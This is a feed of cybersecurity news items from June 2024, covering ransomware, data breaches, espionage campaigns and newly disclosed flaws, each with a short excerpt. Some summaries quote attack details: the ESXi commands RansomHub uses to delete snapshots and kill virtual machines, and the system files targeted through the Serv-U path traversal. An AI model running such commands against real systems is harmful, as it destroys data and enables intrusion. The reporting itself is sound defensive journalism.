Organizations have made progress in the past 12 months related to advancing their OT security posture, but there are still critical areas for improvement as IT and OT network environments continue to converge, according to Fortinet. Cyberattacks that compromise OT systems are on the rise: in 2023, 49% of respondents experienced an intrusion that impacted either OT systems only or both IT and OT systems, but this year, 73% of organizations are being impacted. The … More

          The post Improving OT cybersecurity remains a work in progress appeared first on Help Net Security.


Autosummary: At the same time, there was an increase in plans to move OT responsibility to other C-suite roles, including the CIO, CTO and COO, to upwards of 60% in the next 12 months, clearly showing concern for OT security and risk in 2024 and beyond.


          Most cybersecurity pros took time off due to mental health issues

          ciber
          2024-06-20 https://www.helpnetsecurity.com/2024/06/20/cybersecurity-stress-burnout-cost/

          Cybersecurity and infosecurity professionals say that work-related stress, fatigue, and burnout are making them less productive, including taking extended sick leave – costing US enterprises almost $626 million in lost productivity every year, according to Hack The Box. Cybersecurity has an essential role to play for businesses, clearly demonstrated by the inclusion of CISOs on the board. With increased numbers of threats rising 600% since the pandemic, the proliferation of criminal groups, and the emergence … More

          The post Most cybersecurity pros took time off due to mental health issues appeared first on Help Net Security.


Autosummary: 90% of CISOs say they are concerned about the impact of stress, fatigue, and burnout on their workforce’s well-being, whereas only 47% of CEOs seem to be equally concerned about the effect of their cybersecurity teams’ stress, fatigue, and burnout on increased errors. Cybersecurity and infosecurity professionals say that work-related stress, fatigue, and burnout are making them less productive, including taking extended sick leave – costing US enterprises almost $626 million in lost productivity every year, according to Hack The Box.


          New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration

          exploits
          2024-06-20 https://thehackernews.com/2024/06/new-rust-based-fickle-malware-uses.html
A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts. Fortinet FortiGuard Labs said it's aware of four different distribution methods -- namely VBA dropper, VBA downloader, link downloader, and executable downloader -- with some of them using a



          Experts Uncover New Evasive SquidLoader Malware Targeting Chinese Organizations

          exploits
          2024-06-20 https://thehackernews.com/2024/06/experts-uncover-new-evasive-squidloader.html
Cybersecurity researchers have uncovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations. AT&T LevelBlue Labs, which first observed the malware in late April 2024, said it incorporates features that are designed to thwart static and dynamic analysis and ultimately evade detection. Attack chains leverage phishing emails that



          An unpatched bug allows anyone to impersonate Microsoft corporate email accounts

          exploits
          2024-06-20 https://securityaffairs.com/164675/hacking/expert-warns-of-a-spoofing-bug.html
A researcher discovered a flaw that allows attackers to impersonate Microsoft corporate email accounts and launch phishing attacks. The security researcher Vsevolod Kokorin (@Slonser) discovered a bug that allows anyone to impersonate Microsoft corporate email accounts. An attacker can trigger the vulnerability to launch phishing attacks. The researchers demonstrated the bug exploitation to TechCrunch, Kokorin […]

Autosummary: An unpatched bug allows anyone to impersonate Microsoft corporate email accounts (Pierluigi Paganini, June 20, 2024). A researcher discovered a flaw that allows attackers to impersonate Microsoft corporate email accounts and launch phishing attacks.


          Smishing Triad Is Targeting Pakistan To Defraud Banking Customers At Scale

          financial
          2024-06-20 https://securityaffairs.com/164705/cyber-crime/smishing-triad-targets-pakistan.html
Resecurity researchers warn of a new activity of Smishing Triad, which has expanded its operations to Pakistan. The group’s latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage/SMS. The goal […]



          Climate change stoked US, Mexico heatwave - report

          latam
          2024-06-20 https://www.bbc.com/news/articles/czvvqdg8zxno
Scientists say human-induced climate change made extreme heat 35 times more likely.



          CDK Global cyberattack cripples 15,000 US auto dealerships

          ciber
          2024-06-20 https://www.helpnetsecurity.com/2024/06/20/cdk-cyberattack/

CDK Global, a software-as-a-service (SaaS) provider for car dealers and auto equipment manufacturers, has suffered a cyberattack that has temporarily disrupted its customers’ operations. About CDK and its platform: CDK’s platform is used by 15,000+ car dealerships across North America to manage their sales, customer relationships, financing, inventory, customer support, and other aspects of their day-to-day operations. The customers use locally installed apps to access the CDK platform, and round-the-clock access to the platform and … More

          The post CDK Global cyberattack cripples 15,000 US auto dealerships appeared first on Help Net Security.


Autosummary: About CDK and its platform: CDK’s platform is used by 15,000+ car dealerships across North America to manage their sales, customer relationships, financing, inventory, customer support, and other aspects of their day-to-day operations.


          Tool Overload: Why MSPs Are Still Drowning with Countless Cybersecurity Tools in 2024

          ciber
          2024-06-20 https://thehackernews.com/2024/06/tool-overload-why-msps-are-still.html
Highlights. Complex Tool Landscape: Explore the wide array of cybersecurity tools used by MSPs, highlighting the common challenge of managing multiple systems that may overlap in functionality but lack integration. Top Cybersecurity Challenges: Discuss the main challenges MSPs face, including integration issues, limited visibility across systems, and the high cost and complexity of maintaining

Autosummary: The Guardz unified cybersecurity platform encompasses email security, endpoint security, secure web browsing, phishing simulation, DLP, cyber insurance, and more to provide you with user-centric and automated threat detection and response, giving your clients peace of mind that their business is being secured from the inside out. Alert Fatigue: Too Many Tools, Too Much Noise. Since MSPs rely on so many standalone cybersecurity tools to handle daily operations, they are tasked with an overwhelming number of alerts and large volumes of data that need to be ingested and analyzed. Top Cybersecurity Challenges: Discuss the main challenges MSPs face, including integration issues, limited visibility across systems, and the high cost and complexity of maintaining diverse tools.


          Chinese Cyber Espionage Targets Telecom Operators in Asia Since 2021

          Telcos
          2024-06-20 https://thehackernews.com/2024/06/chinese-cyber-espionage-targets-telecom.html
Cyber espionage groups associated with China have been linked to a long-running campaign that has infiltrated several telecom operators located in a single Asian country at least since 2021. "The attackers placed backdoors on the networks of targeted companies and also attempted to steal credentials," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News



          Storm Alberto claims lives in Mexico and drenches US coast

          latam
          2024-06-20 https://www.bbc.com/news/articles/cxwwzm0xmygo
The first named storm of the season comes as much of North America swelters in brutal heat.

Autosummary: The state's disaster declaration, issued by Governor Greg Abbott, means that "widespread and severe property damage, injury and loss of life" are possible.


          Booking.com warns of up to 900% increase in travel scams

          financial
          2024-06-20 https://www.bbc.com/news/articles/c8003dd8jzeo
The online travel firm says generative AI tools, such as ChatGPT, are driving the explosive rise.



          SolarWinds Serv-U path-traversal flaw actively exploited in attacks

          exploits
          2024-06-20 https://www.bleepingcomputer.com/news/security/solarwinds-serv-u-path-traversal-flaw-actively-exploited-in-attacks/
Threat actors are actively exploiting a SolarWinds Serv-U path-traversal vulnerability, leveraging publicly available proof-of-concept (PoC) exploits. [...]

Autosummary: (Figure: Exploitation attempts on Windows and Linux. Source: GreyNoise.) The most frequently targeted files seen by GreyNoise are: \etc/passwd (contains user account data on Linux); /ProgramData/RhinoSoft/Serv-U/Serv-U-StartupLog.txt (contains startup log info for the Serv-U FTP server); and /windows/win.ini (initialization file containing Windows configuration settings). Attackers target those files to escalate their privileges or explore secondary opportunities in the breached network.


          CDK Global hacked again while recovering from first cyberattack

          ciber
          2024-06-20 https://www.bleepingcomputer.com/news/security/cdk-global-hacked-again-while-recovering-from-first-cyberattack/
Car dealership SaaS platform CDK Global suffered an additional breach Wednesday night as it was starting to restore systems shut down in a previous cyberattack. [...]

Autosummary: CDK Global is a software-as-a-service platform that provides a full suite of applications to handle a car dealership's operation, including sales, back office, financing, inventory, and service and support.


          Ransomware attacks skyrocket, with LockBit 3.0 at the forefront

          exploits ransomware
          2024-06-20 https://www.exponential-e.com/blog/ransomware-attacks-skyrocket-with-lockbit-3-0-at-the-forefront
Newly-released research indicates that ransomware attacks reached a record high in May, with the surge primarily fueled by a massive increase in the number of attacks perpetrated by the LockBit ransomware group and its affiliates. Read more in my article on the Exponential-e blog.



          Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks

          industry ciber
          2024-06-20 https://www.helpnetsecurity.com/2024/06/20/crown-equipment-cyberattack/

Ohio-based Crown Equipment, which is among the largest industrial and forklift truck manufacturers in the world, has become a victim of a cyberattack “by an international cybercriminal organization,” the company finally confirmed to its employees on Tuesday. The confirmation came nine days after the company’s network went down (on June 9) and eight days after its manufacturing plants came to a standstill (on June 10), as reported by German security blogger Günter … More

          The post Crown Equipment cyberattack confirmed, manufacturing disrupted for weeks appeared first on Help Net Security.




          Researchers Uncover UEFI Vulnerability Affecting Multiple Intel CPUs

          exploits
          2024-06-20 https://thehackernews.com/2024/06/researchers-uncover-uefi-vulnerability.html
Cybersecurity researchers have disclosed details of a now-patched security flaw in Phoenix SecureCore UEFI firmware that affects multiple families of Intel Core desktop and mobile processors. Tracked as CVE-2024-0762 (CVSS score: 7.5), the "UEFIcanhazbufferoverflow" vulnerability has been described as a case of a buffer overflow stemming from the use of an unsafe variable in the Trusted Platform



          French Diplomatic Entities Targeted in Russian-Linked Cyber Attacks

          rusia-ucrania
          2024-06-20 https://thehackernews.com/2024/06/french-diplomatic-entities-targeted-in.html
State-sponsored actors with ties to Russia have been linked to targeted cyber attacks aimed at French diplomatic entities, the country's information security agency ANSSI said in an advisory. The attacks have been attributed to a cluster tracked by Microsoft under the name Midnight Blizzard (formerly Nobelium), which overlaps with activity tracked as APT29, BlueBravo, Cloaked Ursa, Cozy Bear,

Autosummary: "Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies, and consulates," the agency said.


          China-linked spies target Asian Telcos since at least 2021

          Telcos
          2024-06-20 https://securityaffairs.com/164735/apt/china-cyberspies-target-asian-telcos.html
A China-linked cyber espionage group has compromised telecom operators in an Asian country since at least 2021. The Symantec Threat Hunter Team reported that an alleged China-linked APT group has infiltrated several telecom operators in a single, unnamed, Asian country at least since 2021. The threat actors used tools associated with Chinese espionage groups, they […]

Autosummary: They deployed custom keylogging malware, port scanning tools, credential theft through the dumping of registry hives, a publicly available tool known as Responder that acts as a Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and multicast DNS (mDNS) poisoner, and enabling RDP. China-linked spies target Asian Telcos since at least 2021 (Pierluigi Paganini, June 20, 2024).


          Peruvian ex-soldiers who raped teenagers jailed

          latam
          2024-06-20 https://www.bbc.com/news/articles/ce99r0xlznko
The rapes were carried out systematically during Peru's internal conflict, the court ruled.

Autosummary: By Vanessa Buschschlüter, BBC News. (Image caption: There were emotional scenes outside the court room.) A court in Peru has sentenced 10 retired soldiers for raping nine teenage girls and women during the country's armed conflict decades ago.


          UNC3886 hackers use Linux rootkits to hide on VMware ESXi VMs

          Linux
          2024-06-20 https://www.bleepingcomputer.com/news/security/unc3886-hackers-use-linux-rootkits-to-hide-on-vmware-esxi-vms/
A suspected Chinese threat actor tracked as UNC3886 uses publicly available open-source rootkits named "Reptile" and "Medusa" to remain hidden on VMware ESXi virtual machines, allowing them to conduct credential theft, command execution, and lateral movement. [...]

Autosummary: Includes "VirtualShine" (bash shell access through VMCI sockets), "VirtualPie" (file transfer, command execution, reverse shell), and "VirtualSphere" (controller transmitting the commands). The most recent attacks by UNC3886, according to Mandiant, targeted organizations in North America, Southeast Asia, and Oceania, with additional victims identified in Europe, Africa, and other parts of Asia.


          Qilin ransomware: What you need to know

          exploits ransomware
          2024-06-20 https://www.tripwire.com/state-of-security/qilin-ransomware-what-you-need-know
Qilin (also known as Agenda) is a ransomware-as-a-service criminal operation that works with affiliates, encrypting and exfiltrating the data of hacked organisations and then demanding a ransom be paid. Read more in my article on the Tripwire State of Security blog.

Autosummary: Qilin (also known as Agenda) is a ransomware-as-a-service criminal operation that works with affiliates, encrypting and exfiltrating the data of hacked organisations and then demanding a ransom be paid. And yet, in a series of media interviews, the Qilin ransomware gang has claimed that its attack against the hospitals was not financially-motivated at all, but instead part of a protest against the British government's involvement in an unspecified war. The Qilin ransomware group has never claimed to have political motivations for its actions in the past, and history has shown that it has no qualms about hitting all kinds of businesses, schools, hospitals and healthcare organisations in its attacks.


          Atlassian fixed six high-severity bugs in Confluence Data Center and Server

          exploits
          2024-06-20 https://securityaffairs.com/164743/security/atlassian-confluence-crucible-jira-flaws.html
Australian software company Atlassian addressed multiple high-severity vulnerabilities in its Confluence, Crucible, and Jira solutions. The Atlassian June 2024 Security Bulletin addressed nine high-severity vulnerabilities in Confluence, Crucible, and Jira products. The most severe issue addressed by the company is an improper authorization flaw in the org.springframework.security:spring-security-core dependency in Confluence Data Center and Server. The flaw, tracked as CVE-2024-22257 […]



          Phoenix UEFI vulnerability impacts hundreds of Intel PC models

          exploits
          2024-06-20 https://www.bleepingcomputer.com/news/security/phoenix-uefi-vulnerability-impacts-hundreds-of-intel-pc-models/
A newly discovered vulnerability in Phoenix SecureCore UEFI firmware tracked as CVE-2024-0762 impacts devices running numerous Intel CPUs, with Lenovo already releasing new firmware updates to resolve the flaw. [...]

Autosummary: Carbon 7th Gen and X1 Yoga 4th Gen devices, but later confirmed with Phoenix that it affects the SecureCore firmware for Alder Lake, Coffee Lake, Comet Lake, Ice Lake, Jasper Lake, Kaby Lake, Meteor Lake, Raptor Lake, Rocket Lake, and Tiger Lake Intel CPUs as well.


          CosmicSting flaw impacts 75% of Adobe Commerce, Magento sites

          industry
          2024-06-20 https://www.bleepingcomputer.com/news/security/cosmicsting-flaw-impacts-75-percent-of-adobe-commerce-magento-sites/
A vulnerability dubbed "CosmicSting" impacting Adobe Commerce and Magento websites remains largely unpatched nine days after the security update has been made available, leaving millions of sites open to catastrophic attacks. [...]

Autosummary: Apply fix or mitigation now. The vendor released fixes for CVE-2024-34102 with the following versions, which e-commerce platform administrators are recommended to apply as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9; Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8; Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9; Adobe Commerce Webhooks Plugin version 1.5.0. Sansec recommends that site admins switch to "Report-Only" mode before upgrading to avoid an issue that may break checkout functionality.


          Linux version of RansomHub ransomware targets VMware ESXi VMs

          exploits ransomware Linux
          2024-06-20 https://www.bleepingcomputer.com/news/security/linux-version-of-ransomhub-ransomware-targets-vmware-esxi-vms/
The RansomHub ransomware operation is using a Linux encryptor designed specifically to encrypt VMware ESXi environments in corporate attacks. [...]

Autosummary: (Figure: Configuration options and commands. Source: Recorded Future.) It also features ESXi-specific commands and options, like "vim-cmd vmsvc/getallvms" and "vim-cmd vmsvc/snapshot.removeall" for snapshot deletion, and "esxcli vm process kill" for shutting down VMs.


          US bans Kaspersky software for alleged Russian links

          rusia-ucrania
          2024-06-20 https://www.bbc.com/news/articles/ceqq7663wd2o
Government says Moscow's influence over the company was found to pose a significant risk to US infrastructure.



          Cybersecurity jobs available right now: June 19, 2024

          ciber
          2024-06-19 https://www.helpnetsecurity.com/2024/06/19/cybersecurity-jobs-available-right-now-june-19-2024/

Application Penetration Tester, ShiftCode Analytics | USA | On-site. As an Application Penetration Tester, you will perform Ethical Application Penetration Testing (EAPT) on web applications and APIs. Provide the vulnerability information in the predefined report format after performing the App Pentest using manual methodology and App Pentest tools such as Burp Suite and Web Inspect. Provide assistance to the developers in detailing the vulnerabilities reported along with the recommendations for remediation. … More

          The post Cybersecurity jobs available right now: June 19, 2024 appeared first on Help Net Security.


Autosummary: Incident Response Analyst, HackersEye | Israel | Hybrid. As an Incident Response Analyst, you will investigate and respond to cybersecurity incidents, conduct threat hunting activities using various tools and techniques, prepare detailed incident reports and briefings for clients and internal stakeholders, collaborate with cross-functional teams to enhance security measures and protocols, and train junior staff and contribute to knowledge sharing within the team. Senior IAM Engineer, Trade Republic | Germany | Remote. As a Senior IAM Engineer, you will design, develop, test, implement, and integrate Identity and Access Management (IAM) systems and solutions. Cyber Sec Gov & Risk Analyst, UNSW | Australia | On-site. As a Cyber Sec Gov & Risk Analyst, you will maintain cyber security policies and standards, periodically review, update, and align them with the overall policy framework and manage exemptions. Information Technology Specialist (Information Security), U.S. Immigration and Customs Enforcement (ICE) | USA | Remote. As an Information Technology Specialist (Information Security), you will implement high-level security requirements such as those arising from laws, regulations, and presidential directives.


          Find out which cybersecurity threats organizations fear the most

          ciber
          2024-06-19 https://www.helpnetsecurity.com/2024/06/19/cybersecurity-threats-statistics-2024/

          This article compiles excerpts from various reports, presenting statistics and insights on cybersecurity threats faced by businesses and individuals alike. Cyber insurance isn’t the answer for ransom payments Veeam | 2024 Ransomware Trends Report | June 2024 Ransomware remains an ongoing threat for organizations and is the largest single cause of IT outages and downtime as 41% of data is compromised during a cyberattack. Alarmingly, 63% of organizations are at risk of reintroducing infections while … More

          The post Find out which cybersecurity threats organizations fear the most appeared first on Help Net Security.

          "

          Autosummary: Proofpoint | 2024 Voice of the CISO | May 2024 In 2024, 70% of CISOs surveyed feel at risk of experiencing a material cyber attack in the next 12 months, compared to 68% in 2023 and 48% in 2022.


          Rising exploitation in enterprise software: Key trends for CISOs

          exploits
          2024-06-19 https://www.helpnetsecurity.com/2024/06/19/exploitation-enterprise-software/

          Action1 researchers found an alarming increase in the total number of vulnerabilities across all enterprise software categories. “With the NVD’s delay in associating Common Vulnerabilities and Exposures (CVE) identifiers with CPE (Common Platform Enumeration) data, our report comes at a critical moment, providing much-needed insights into the evolving vulnerability landscape for enterprise software,” said Mike Walters, President of Action1. “Our goal is to arm key decision makers with essential knowledge so that they can prioritize … More

          The post Rising exploitation in enterprise software: Key trends for CISOs appeared first on Help Net Security.

          "

          Autosummary: “With the NVD’s delay in associating Common Vulnerabilities and Exposures (CVE) identifiers with CPE (Common Platform Enumeration) data, our report comes at a critical moment, providing much-needed insights into the evolving vulnerability landscape for enterprise software,” said Mike Walters, President of Action1.


          Clever macOS malware delivery campaign targets cryptocurrency users

          exploits
          2024-06-19 https://www.helpnetsecurity.com/2024/06/19/cryptocurrency-malware/

          Cryptocurrency users are being targeted with legitimate-looking but fake apps that deliver information-stealing malware instead, Recorded Future’s researchers are warning. The threat actor behind this complex scheme is going after both Windows and Mac users, and leverages social media and messaging platforms to trick them into installing the apps, i.e., the malware. How cryptocurrency users get tricked into downloading the malware Vortax – supposedly in-browser virtual meeting software – looks like a legitimate app at … More

          The post Clever macOS malware delivery campaign targets cryptocurrency users appeared first on Help Net Security.

          "

          Autosummary: How cryptocurrency users get tricked into downloading the malware Vortax – supposedly in-browser virtual meeting software – looks like a legitimate app at first glance: it has a website indexed by major search engines and an associated Medium blog with suspected AI-generated articles; the website provides a physical address for the company and contains claims about Fortune 500 companies as customers and awards received from tech publications; it has a “verified” X account, as well as Telegram and Discord accounts. After asking a direct question or while engaging in discussions on cryptocurrency-themed channels, potential targets are instructed by Vortax accounts to visit the site, click on the “Try Vortax for free” button, and enter the provided Room ID to be able to download the application.


          Warning: Markopolo's Scam Targeting Crypto Users via Fake Meeting Software

          financial
          2024-06-19 https://thehackernews.com/2024/06/warning-markopolos-scam-targeting.html
          A threat actor who goes by alias markopolo has been identified as behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware and carries out cryptocurrency theft. The attack chains involve the use of a purported virtual meeting software named Vortax (and 23 other apps) that are used as a conduit to deliver Rhadamanthys, StealC,

          Autosummary: "This campaign, primarily targeting cryptocurrency users, marks a significant rise in macOS security threats and reveals an expansive network of malicious applications," the cybersecurity company noted, describing markopolo as "agile, adaptable, and versatile. "


          "Researchers" exploit Kraken exchange bug, steal $3 million in crypto

          exploits
          2024-06-19 https://www.bleepingcomputer.com/news/security/researchers-exploit-kraken-exchange-bug-steal-3-million-in-crypto/
          The Kraken crypto exchange disclosed today that alleged security researchers exploited a zero-day website bug to steal $3 million in cryptocurrency and then refused to return the funds. [...]

          Autosummary: "Instead, they demanded a call with their business development team (i.e. their sales reps) and have not agreed to return any funds until we provide a speculated $ amount that this bug could have caused if they had not disclosed it," claimed Percoco. "


          UNC3886 Uses Fortinet, VMware 0-Days and Stealth Tactics in Long-Term Spying

          industry
          2024-06-19 https://thehackernews.com/2024/06/chinese-cyber-espionage-group-exploits.html
          The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed utilizing multiple persistence mechanisms in order to maintain unfettered access to compromised environments. "Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available

          Autosummary: " Some of the other malware families delivered during the course of attacks aimed at VMware instances are below - A trojanized version of a legitimate TACACS daemon with credential-logging functionality VIRTUALSHINE, a VMware VMCI sockets-based backdoor that provides access to a bash shell VIRTUALPIE, a Python backdoor that supports file transfer, arbitrary command execution, and reverse shell capabilities VIRTUALSPHERE, a controller module associated with a VMCI-based backdoor Over the years, virtual machines have become lucrative targets for threat actors owing to their widespread use in cloud environments. "


          Chip maker giant AMD investigates a data breach

          financial
          2024-06-19 https://securityaffairs.com/164676/data-breach/amd-investigates-data-breach.html
          AMD announced an investigation after a threat actor attempted to sell data allegedly stolen from its systems. AMD has launched an investigation after the threat actor IntelBroker announced they were selling sensitive data allegedly belonging to the company. “We are aware of a cybercriminal organization claiming to be in possession of stolen AMD data,” the […]

          Autosummary: "


          Chinese "underground bankers" accused of aiding Mexican cartel

          financial
          2024-06-19 https://www.bbc.com/news/articles/cw44mdkg0e9o
          The US says money exchanges were used by the powerful Sinaloa gang to shift money to Mexico.

          Autosummary: "


          Advance Auto Parts confirms data breach exposed employee information

          financial
          2024-06-19 https://www.bleepingcomputer.com/news/security/advance-auto-parts-confirms-data-breach-exposed-employee-information/
          Advance Auto Parts has confirmed it suffered a data breach after a threat actor attempted to sell stolen data on a hacking forum earlier this month. [...]

          Autosummary: "


          CDK Global cyberattack impacts thousands of US car dealerships

          ciber
          2024-06-19 https://www.bleepingcomputer.com/news/security/cdk-global-cyberattack-impacts-thousands-of-us-car-dealerships/
          Car dealership software-as-a-service provider CDK Global was hit by a massive cyberattack, causing the company to shut down its systems and leaving clients unable to operate their business normally. [...]

          Autosummary: CDK Global provides clients in the auto industry a SaaS platform that handles all aspects of a car dealership's operation, including CRM, financing, payroll, support and service, inventory, and back office operations. These negotiations can take weeks, and if a ransom is not paid, the threat actors ultimately leak the corporate data, which usually includes the personal information of employees and, potentially, customers.


          Kraken Crypto Exchange Hit by $3 Million Theft Exploiting Zero-Day Flaw

          exploits
          2024-06-19 https://thehackernews.com/2024/06/kraken-crypto-exchange-hit-by-3-million.html
          Crypto exchange Kraken revealed that an unnamed security researcher exploited an "extremely critical" zero-day flaw in its platform to steal $3 million in digital assets and refused to return them. Details of the incident were shared by Kraken's Chief Security Officer, Nick Percoco, on X (formerly Twitter), stating it received a Bug Bounty program alert about a bug that "allowed them to

          Autosummary: Details of the incident were shared by Kraken's Chief Security Officer, Nick Percoco, on X (formerly Twitter), stating it received a Bug Bounty program alert about a bug that "allowed them to artificially inflate their balance on our platform" without sharing any other details. The company said it identified a security issue within minutes of receiving the alert that essentially permitted an attacker to "initiate a deposit onto our platform and receive funds in their account without fully completing the deposit."


          Crown Equipment confirms a cyberattack disrupted manufacturing

          industry ciber
          2024-06-19 https://www.bleepingcomputer.com/news/security/crown-equipment-confirms-a-cyberattack-disrupted-manufacturing/
          Forklift manufacturer Crown Equipment confirmed today that it suffered a cyberattack earlier this month that disrupted manufacturing at its plants. [...]

          Autosummary: With IT systems down, employees have been unable to clock in their hours, access service manuals, and, we are told, deliver machinery in some cases.


          Mass exploitation is the new primary attack vector for ransomware

          exploits ransomware
          2024-06-18 https://www.helpnetsecurity.com/2024/06/18/vulnerable-software-mass-exploitation/

          The cyber threat landscape in 2023 and 2024 has been dominated by mass exploitation, according to WithSecure. Edge service KEV vulnerability trends 64% of all edge service and infrastructure Common Vulnerabilities and Exposures (CVEs) in the Known Exploited Vulnerability Catalogue (KEV) exist above the 97.5th percentile of EPSS scores (a metric that scores CVEs based on the likelihood of exploitation). Only 23% of all other CVEs in the KEV are above the 97.5th percentile. Furthermore, … More

          The post Mass exploitation is the new primary attack vector for ransomware appeared first on Help Net Security.

          "

          Autosummary: There has been a rapid tempo of security incidents caused by the mass exploitation of vulnerable software such as MOVEit, CitrixBleed, Cisco XE, Fortiguard’s FortiOS, Ivanti ConnectSecure, Palo Alto’s PAN-OS, Juniper’s Junos, and ConnectWise ScreenConnect.


          How to create your cybersecurity “Google Maps”: A step-by-step guide for security teams

          ciber
          2024-06-18 https://www.helpnetsecurity.com/2024/06/18/mapping-security-process/

          Cybersecurity isn’t just about firewalls and antivirus. It’s about understanding how your defenses, people, and processes work together. Just like Google Maps revolutionized navigation, process mapping can revolutionize how you understand and manage your security landscape. We used to wrestle with paper maps to navigate new places. This was dangerous and inconvenient. Reading a map while driving means you do neither well. Then came the seemingly magical turn-by-turn GPS systems from the likes of Garmin … More

          The post How to create your cybersecurity “Google Maps”: A step-by-step guide for security teams appeared first on Help Net Security.

          "

          Autosummary: Mapping your never-ending security evolution Although it’s an amazing product, we all run into errors on Google Maps — stores or restaurants that are closed, distances that are slightly off, directions that tell you to turn left at an intersection with a “No Left Turn” sign. Integrate with your tools: link your map to your SIEM, ticketing system, chat, email and security orchestration tools, etc. The ideal tool lets you create dynamic, interactive process maps that can be updated in real-time and filtered on any critical attribute (role, condition, location, type of process).


          Singapore Police Extradites Malaysians Linked to Android Malware Fraud

          exploits
          2024-06-18 https://thehackernews.com/2024/06/singapore-police-extradites-malaysians.html
          The Singapore Police Force (SPF) has announced the extradition of two men from Malaysia for their alleged involvement in a mobile malware campaign targeting citizens in the country since June 2023. The unnamed individuals, aged 26 and 47, engaged in scams that tricked unsuspecting users into downloading malicious apps onto their Android devices via phishing campaigns with the aim of stealing

          Autosummary: "Vendors on Empire Market offered to sell various illicit goods and services, including controlled substances such as heroin, methamphetamine, cocaine, and LSD, as well as counterfeit currency and stolen credit card information," the DoJ said, citing a superseding indictment announced last week. "


          The Financial Dynamics Behind Ransomware Attacks

          financial exploits ransomware industry
          2024-06-18 https://securityaffairs.com/164636/cyber-crime/financial-dynamics-ransomware-attacks.html
          Over the last few years, ransomware attacks have become one of the most prevalent and expensive forms of cybercrime. Initially, these attacks involved malicious software that encrypts a victim’s data, rendering it inaccessible until a ransom is paid to the attackers. Today, this tactic has evolved, where ransomware operators in nearly every case first exfiltrate […]

          Autosummary: A multi-pronged approach, including strengthening cyber defenses, improving regulations, and raising awareness, is crucial to mitigating the risk and impact of ransomware. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.


          Convicted BEC scammer could face over 100 years in prison

          financial
          2024-06-18 https://www.bitdefender.com/blog/hotforsecurity/bec-scammer-100-years-prison/
          A US court has found a Nigerian national guilty of charges related to a US $1.5 million business email compromise (BEC) scam and could face the rest of his life in prison as a consequence. Read more in my article on the Hot for Security blog.

          Autosummary: Umeti is scheduled to be sentenced on August 27, 2024, and faces a maximum penalty of up to 102 years in prison for charges which include wire fraud conspiracy, intentional damage to a protected computer, and multiple wire fraud counts.


          SUSE announces Liberty Linux Lite for CentOS 7

          Linux
          2024-06-18 https://www.helpnetsecurity.com/2024/06/18/suse-liberty-linux-for-centos-7/

          SUSE announced a new SUSE Liberty Linux offering to help protect CentOS systems from future vulnerabilities. SUSE Liberty Linux Lite for CentOS 7 is a frictionless solution that provides customers with updates and security patches for their existing CentOS system, with no migration whatsoever. This gives customers the security and certainty of uninterrupted, SUSE enterprise Linux support, without the hassle and disruption of switching OS on-premises or in the cloud. “Open source technologies are the … More

          The post SUSE announces Liberty Linux Lite for CentOS 7 appeared first on Help Net Security.

          "

          Autosummary: “Open source technologies are the cornerstone of innovation for enterprises, fostering collaboration, agility, and cost-effectiveness,” said Rick Spencer, GM of Business Critical Linux, SUSE.


          New Malware Targets Exposed Docker APIs for Cryptocurrency Mining

          exploits
          2024-06-18 https://thehackernews.com/2024/06/new-malware-targets-exposed-docker-apis.html
          Cybersecurity researchers have uncovered a new malware campaign that targets publicly exposed Docker API endpoints with the aim of delivering cryptocurrency miners and other payloads. Included among the tools deployed is a remote access tool that's capable of downloading and executing more malicious programs as well as a utility to propagate the malware via SSH, cloud analytics platform Datadog

          Autosummary: " The shell script, "ar.sh," performs a number of actions, including setting up a working directory, installing tools to scan the internet for vulnerable hosts, disabling firewall, and ultimately fetching the next-stage payload, referred to as "chkstart. "


          Keytronic confirms data breach after ransomware attack

          financial exploits ransomware
          2024-06-18 https://securityaffairs.com/164642/data-breach/keytronic-blackbasta-ransomware.html
          Printed circuit board assembly (PCBA) manufacturer Keytronic disclosed a data breach after a ransomware attack. Keytronic has confirmed a data breach after a ransomware group leaked allegedly stolen personal information from its systems. The company did not provide any info on the ransomware operation that hit its network, however Black Basta ransomware group leaked over […]

          Autosummary: Black Basta ransomware group claims to have stolen ≈530 GB of data, including HR, Finance, Engineering documents, Corporate data, and home users data.


          43% of couples experience pressure to share logins and locations, Malwarebytes finds

          exploits
          2024-06-18 https://www.malwarebytes.com/blog/news/2024/06/43-of-couples-experience-pressure-to-share-logins-and-locations-malwarebytes-finds
          Digital sharing between romantic partners is the norm, but new research from Malwarebytes shows that many feel pressured to hand over access.

          Autosummary: While everybody shares some type of device, account, or location access with their significant other (100% of respondents), and plenty grant their significant other access to at least one personal account (85%), a sizeable portion longs for something different—31% said they worry about “how easy it is for my partner to track what I’m doing and where I am all times because of how much we share,” and 40% worry that “telling my partner I don’t want to share logins, PINs, and/or locations would upset them.” By surveying 500 people in committed relationships in the United States, Malwarebytes has captured a unique portrait of what it means to date, marry, and be in love in 2024—a part of life that is now inseparable from smart devices, apps, and the internet at large.


          Medibank breach: Security failures revealed (lack of MFA among them)

          financial
          2024-06-18 https://www.helpnetsecurity.com/2024/06/18/medibank-breach-security-failures/

